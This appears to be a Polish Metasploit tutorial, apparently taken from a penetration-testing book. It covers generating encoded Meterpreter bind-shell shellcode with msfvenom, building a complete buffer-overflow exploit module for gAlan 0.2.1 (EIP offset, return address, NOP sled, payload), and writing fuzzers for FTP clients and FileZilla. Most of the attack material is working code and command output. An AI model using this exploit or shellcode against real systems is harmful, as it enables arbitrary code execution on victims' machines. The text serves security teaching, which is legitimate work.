Korzystanie z narzdzia msfvenom

root@bt:~# msfvenom -h
Usage: /opt/framework/msf3/msfvenom [options] 

Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom..
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, bash..
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]         The number of times to encode the payload
    -c, --add-code   [path]          Specify an additional win32 shellcode file to include
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as..
    -h, --help                       Show this message



root@bt:~# msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3

[*] x86/shikata_ga_nai succeeded with size 325 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 352 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 379 (iteration=3)
buf = 
"\xdb\xdb\xbe\x0a\x3a\xfc\x6d\xd9\x74\x24\xf4\x5a\x29\xc9" +
"\xb1\x52\x31\x72\x18\x83\xea\xfc\x03\x72\x1e\xd8\x09\xb6" +
"\xce\xc5\x86\x6d\x1a\xa8\xd8\x88\xa8\xbc\x51\x64\xe5\xf2" +
"\xd1\xb7\x80\xed\x66\x72\x6e\x0d\x1c\x68\x6a\xae\xcd\x0e" +
"\x33\x90\x1d\x73\x82\xd8\xd7\xe0\x87\x76\xbd\x25\xf4\x23" +
"\x4d\x38\xc2\xc3\xe9\xa1\x7e\x31\xc5\xe4\x84\x2a\x3b\x37" +
"\xb3\xd6\x13\xc4\x09\x89\xd0\x95\x21\x10\x6b\x83\x94\x3d" +
----------------------------------------------------------------------------

Konwertowanie exploita na modu frameworku Metasploit

root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb

Usage: pattern_create.rb length [set a] [set b] [set c]

root@bt:/opt/metasploit/msf3/tools# ./pattern_create.rb 5000




root@bt:/opt/metasploit/msf3/tools# ./pattern_offset.rb 0x234abc 5000

1032


Nastpnie zdefiniujemy funkcj initialize() zawierajc informacje o exploicie i zarejestrujemy opcje:
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
        include Msf::Exploit::FILEFORMAT
        def initialize(info = {})
                super(update_info(info,
                        'Name' => 'gAlan 0.2.1 Buffer Overflow Exploit',
                        'Description' => %q{
                    This module exploits a stack overflow in gAlan 0.2.1
                         By creating a specially crafted galan file, an attacker may be able
                         to execute arbitrary code.
            },
                        'License' => MSF_LICENSE,
                        'Author' => [ 'original by Jeremy Brown' ],
                        'Version' => '$Revision: 7724 $',
                        'References' =>
                                [
                                        [ 'URL', 'http://www.exploit-db.com/exploits/10339' ],
                                ],
                        'DefaultOptions' =>
                                {
                                        'EXITFUNC' => 'process',
                                },
                        'Payload' =>
                                {
                                        'Space' => 1000,
                                        'BadChars' => "\x00\x0a\x0d\x20\x0c\x0b\x09",
                                        'StackAdjustment' => -3500,
                                },
                        'Platform' => 'win',
                        'Targets' =>
                                [
                    [ 'Windows XP Universal', { 'Ret' => 0x100175D0} ],      # 0x100175D0 call esi @ glib-1_3
                                ],
                        'Privileged' => false,
                      
                        'DefaultTarget' => 0))
                        register_options(
                                [
                                        OptString.new('FILENAME', [ false, 'The file name.', 'evil.galan']),
                                ], self.class)
        end

Teraz przejdziemy dalej i zbudujemy bufor. Poniewa znalelimy pozycj nadpisania rejestru EIP, moemy zastpi powtrzony adres zwrotny wartoci, wpisujc nastpujcy fragment:
sploit << rand_text_alpha_upper(1028);
 sploit << [target.ret].pack('V');

Nastpnie musimy doda nasz NOP slide. Ten fragment skryptu exploita przyjmuje w module ponisz posta:
sploit << "\x90" * 45

Na koniec budujemy kompletny kod powoki:
sploit << payload.encoded

Teraz moemy zebra te wiersze skryptu w funkcji exploit():
def exploit
                sploit = "Mjik"
                sploit << rand_text_alpha_upper(1028)
                sploit << [target.ret].pack('V')
                sploit << "\x90" * 45
                sploit << payload.encoded
                galan = sploit
                print_status("Creating '#{datastore['FILENAME']}' file ...")
                file_create(galan)
        end
-------------------------------------------------------------------------------

Fuzzowanie aplikacji za pomoc Metasploit

msf > use auxiliary/fuzzers/ftp/client_ftp
msf auxiliary(client_ftp) > show options

Module options:

   Name   Current Setting  Required     Description
   ----   ---------------  --------     -----------
  CYCLIC      true         yes       Use Cyclic pattern instead..
  ENDSIZE    200000        yes       Max Fuzzing string size.
  ERROR       false        yes       Reply with error codes only
  EXTRALINE   true         yes       Add extra CRLF's in..
  FUZZCMDS    LIST..       yes       Comma separated list..
  RESET       true         yes       Reset fuzzing values after..
  SRVHOST    0.0.0.0       yes       The local host to listen on.
  SRVPORT     21           yes       The local port to listen on.
  SSL         false        no        Negotiate SSL for incoming..
  SSLVersion  SSL3         no        Specify the version of SSL..
  STARTSIZE   1000         yes       Fuzzing string startsize.
  STEPSIZE    1000         yes       Increment fuzzing string..


msf auxiliary(client_ftp) > run

[*] Server started.
[*] Client connected : 192.168.56.102
[*]  - Set up active data port 20
[*] Sending response for 'WELCOME' command, arg
[*] Sending response for 'USER' command, arg test
[*] Sending response for 'PASS' command, arg test
[*]  - Set up active data port 16011
[*] Sending response for 'PORT' command, arg 192,168,0,188,62,139
[*] Handling NLST command
[*]  - Establishing active data connection
[*]  - Data connection set up
[*] * Fuzzing response for LIST, payload length 1000
[*] (i) Setting next payload size to 2000
[*]  - Sending directory list via data connection
-----------------------------------------------------------------

Budowanie prostego fuzzera serwera FTP FileZilla

Podstawowy szablon do budowy fuzzera jest podobny do szablonu omawianego przy projektowaniu moduu pomocniczego:

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Auxiliary::Scanner
        def initialize
                super(
                        'Name'           => 'FileZilla Fuzzer',
                        'Version'        => '$Revision: 1 $',
                        'Description'    => 'Filezilla FTP fuzzer',
                        'Author'         => 'Abhinav_singh',
                        'License'        => MSF_LICENSE
                )
                register_options( [
                Opt::RPORT(14147),
           OptInt.new('STEPSIZE', [ false, "Increase string size each iteration with this number of chars",10]),

            OptInt.new('DELAY', [ false, "Delay between connections",0.5]),
            OptInt.new('STARTSIZE', [ false, "Fuzzing string startsize",10]),
                OptInt.new('ENDSIZE', [ false, "Fuzzing string endsize",20000])
                ], self.class)
        end

Zaimportowalimy ju biblioteki MSF, utworzylimy klas i zdefiniowalimy opcje. Kolejnym krokiem jest zdefiniowanie gwnej zawartoci fuzzera:

def run_host(ip)

        udp_sock = Rex::Socket::Udp.create(
                                             'Context' =>
                                                     {
                                                         'Msf' => framework,
                                                         'MsfExploit' => self,
                                                     }
                                          )
        startsize = datastore['STARTSIZE'] # Pocztkowy rozmiar danych fuzzowani   
            count = datastore['STEPSIZE']  # Ustawienie przyrostu rozmiaru
            while count < 10000            # Wykonaj, gdy warto count wynosi mniej ni 10000
                evil = "A" * count         # Ustal liczb znakw "A" rwn wartoci count
                pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00" # Zdefiniuj adunek
                udp_sock.sendto(pkt, ip, datastore['RPORT'])       # Wylij pakiet
                print_status("Sending: #{evil}") 
                resp = udp_sock.get(1)     # Przechwy odpowied
                count += 100               # Zwiksz warto count o 10 i zaptl
            end
      end
end

